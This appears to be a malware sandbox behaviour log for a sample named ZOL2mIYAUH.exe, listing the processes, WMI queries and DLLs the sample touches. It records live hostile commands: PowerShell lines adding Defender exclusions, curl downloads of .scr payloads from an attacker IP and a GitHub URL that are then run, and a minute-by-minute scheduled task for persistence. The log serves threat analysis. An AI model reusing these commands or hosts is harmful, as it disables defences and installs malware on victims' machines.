Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2612
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6488
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1872
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3036
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5620
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3592
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4756
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1736
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2596
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3456
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4844
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 864
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0
Source: C:\Users\gbcd\fff.scr WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\gbcd\qqq.scr File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ZOL2mIYAUH.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe File read: C:\Users\user\Desktop\ZOL2mIYAUH.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ZOL2mIYAUH.exe "C:\Users\user\Desktop\ZOL2mIYAUH.exe"
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c mkdir C:\Users\gbcd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\curl.exe "curl.exe" -s http://79.110.49.246/didedba/abc -o C:\Users\gbcd\fff.scr
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\curl.exe "curl.exe" -s http://79.110.49.246/didedba/dddv -o C:\Users\gbcd\qqq.scr
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\curl.exe "curl.exe" -s http://79.110.49.246/didedba/write -o C:\Users\gbcd\ddd.scr
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\curl.exe "curl.exe" -s https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o C:\Users\gbcd\srtware.exe
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Users\gbcd\fff.scr "C:\Users\gbcd\fff.scr"
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Users\gbcd\qqq.scr "C:\Users\gbcd\qqq.scr"
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\gbcd\qqq.scr'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qqq.scr'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\winnotify.scr'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winnotify.scr'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winnotify" /tr "C:\Users\Public\winnotify.scr"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\Public\winnotify.scr "C:\Users\Public\winnotify.scr" /S
Source: unknown Process created: C:\Users\Public\winnotify.scr "C:\Users\Public\winnotify.scr" /S
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c mkdir C:\Users\gbcd Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\curl.exe "curl.exe" -s http://79.110.49.246/didedba/abc -o C:\Users\gbcd\fff.scr Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\curl.exe "curl.exe" -s http://79.110.49.246/didedba/dddv -o C:\Users\gbcd\qqq.scr Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\curl.exe "curl.exe" -s http://79.110.49.246/didedba/write -o C:\Users\gbcd\ddd.scr Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Windows\SysWOW64\curl.exe "curl.exe" -s https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o C:\Users\gbcd\srtware.exe Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Users\gbcd\fff.scr "C:\Users\gbcd\fff.scr" Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process created: C:\Users\gbcd\qqq.scr "C:\Users\gbcd\qqq.scr" Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\gbcd\qqq.scr' Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qqq.scr' Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\winnotify.scr' Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winnotify.scr' Jump to behavior
Source: C:\Users\gbcd\qqq.scr Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winnotify" /tr "C:\Users\Public\winnotify.scr" Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: version.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: wldp.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: profapi.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: rasman.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: amsi.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: userenv.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: secur32.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: schannel.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\gbcd\fff.scr Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: version.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: wldp.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: profapi.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: amsi.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: userenv.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: propsys.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: edputil.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: netutils.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: slc.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: sppc.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: sxs.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: mpr.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: winmm.dll Jump to behavior
Source: C:\Users\gbcd\qqq.scr Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
